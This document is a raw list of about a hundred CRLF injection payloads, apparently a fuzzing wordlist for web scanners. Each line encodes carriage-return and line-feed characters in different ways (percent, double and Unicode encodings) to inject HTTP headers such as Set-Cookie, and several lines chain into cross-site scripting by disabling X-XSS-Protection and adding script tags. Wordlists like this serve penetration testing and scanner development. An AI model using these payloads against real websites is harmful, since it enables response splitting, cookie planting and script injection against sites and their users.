/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:crlf=injection
/%0d%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:crlf=injection
/%23%0aSet-Cookie:crlf=injection
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
/%3f%0d%0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
/%u000aSet-Cookie:crlf=injection
%%0A0AHeader-Test:BLATRUC
%0A%20Header-Test:BLATRUC
/%0A%20Set-Cookie:whoami=rahul
/%0A%20Set-Cookie:whoami=test
%0AHeader-Test:BLATRUC
/%0Aset-cookie:%20hello=how;%0Aevil=evil;
%0D%0A%09Header-Test:BLATRUC
/%0D%0A%0D%0ASet-Cookie:crlfinjection=rahul
%0D%0A%20Header-Test:BLATRUC
/%0D%0A%20Set-Cookie:whoami=rahul
/%0D%0A%20Set-Cookie:whoami=test
%0D%0AHeader-Test:BLATRUC
/%0D%0ASet-Cookie:crlfinjection=rahul
/%0D%0ASet-Cookie:crlfinjection=test
%0D%20Header-Test:BLATRUC
%0DHeader-Test:BLATRUC
%20%0AHeader-Test:BLATRUC
%20%0D%0AHeader-Test:BLATRUC
/%20%0D%0ASet-Cookie:whoami=rahul
/%20%0D%0ASet-Cookie:whoami=test
%20%0DHeader-Test:BLATRUC
%23%0AHeader-Test:BLATRUC
%23%0D%0AHeader-Test:BLATRUC
%23%0DHeader-Test:BLATRUC
%23%OAHeader-Test:BLATRUC
%250AHeader-Test:BLATRUC
%25250AHeader-Test:BLATRUC
%25%30%61Header-Test:BLATRUC
%25%30AHeader-Test:BLATRUC
/%2F%2E%2E%0D%0ASet-Cookie:whoami=rahul
/%2F%2E%2E%0D%0ASet-Cookie:whoami=test
%3F%0AHeader-Test:BLATRUC
%3F%0D%0AHeader-Test:BLATRUC
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3F%0DHeader-Test:BLATRUC
%5cr%5cnHeader-Test:BLATRUC
crlf%0A%20Header-Test:BLATRUC
crlf%0AHeader-Test:BLATRUC
crlf%0D%0A%09Header-Test:BLATRUC
crlf%0D%0A%20Header-Test:BLATRUC
crlf%0D%0AHeader-Test:BLATRUC
crlf%0D%20Header-Test:BLATRUC
crlf%0DHeader-Test:BLATRUC
crlf%20%0AHeader-Test:BLATRUC
crlf%20%0D%0AHeader-Test:BLATRUC
crlf%20%0DHeader-Test:BLATRUC
crlf%23%0AHeader-Test:BLATRUC
crlf%23%0D%0AHeader-Test:BLATRUC
crlf%23%0DHeader-Test:BLATRUC
crlf%23%OAHeader-Test:BLATRUC
crlf%3F%0AHeader-Test:BLATRUC
crlf%3F%0D%0AHeader-Test:BLATRUC
crlf%3F%0DHeader-Test:BLATRUC
crlf%5cr%5cnHeader-Test:BLATRUC
crlf%E5%98%8A%E5%98%8D%0AHeader-Test:BLATRUC
crlf%E5%98%8A%E5%98%8D%0D%0AHeader-Test:BLATRUC
crlf%E5%98%8A%E5%98%8D%0DHeader-Test:BLATRUC
crlf%E5%98%8A%E5%98%8DHeader-Test:BLATRUC
crlf\r\nHeader-Test:BLATRUC
%E5%98%8A%E5%98%8D%0AHeader-Test:BLATRUC
%E5%98%8A%E5%98%8D%0D%0AHeader-Test:BLATRUC
%E5%98%8A%E5%98%8D%0DHeader-Test:BLATRUC
%E5%98%8A%E5%98%8DHeader-Test:BLATRUC
/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=rahul
/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=thecyberneh
/%E5%98%8D%E5%98%8ASet-Cookie:whoami=thecyberneh%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BE
/google.com/%2F..%0D%0AHeader-Test:BLATRUC
 \r\n Header-Test:BLATRUC
\r\n Header-Test:BLATRUC
\r\nHeader-Test:BLATRUC
%u000AHeader-Test:BLATRUC
/www.google.com/%2E%2E%2F%0D%0AHeader-Test:BLATRUC
//www.google.com/%2F%2E%2E%0D%0AHeader-Test:BLATRUC
/嘍嘊Set-Cookie:whoami=thecyberneh嘍嘊嘍嘊嘍嘊<script>alert(1);</script>
/嘍嘊Set-Cookie:whoami=thecyberneh嘍嘊嘍嘊嘍嘊嘼script嘾alert(1);嘼/script嘾
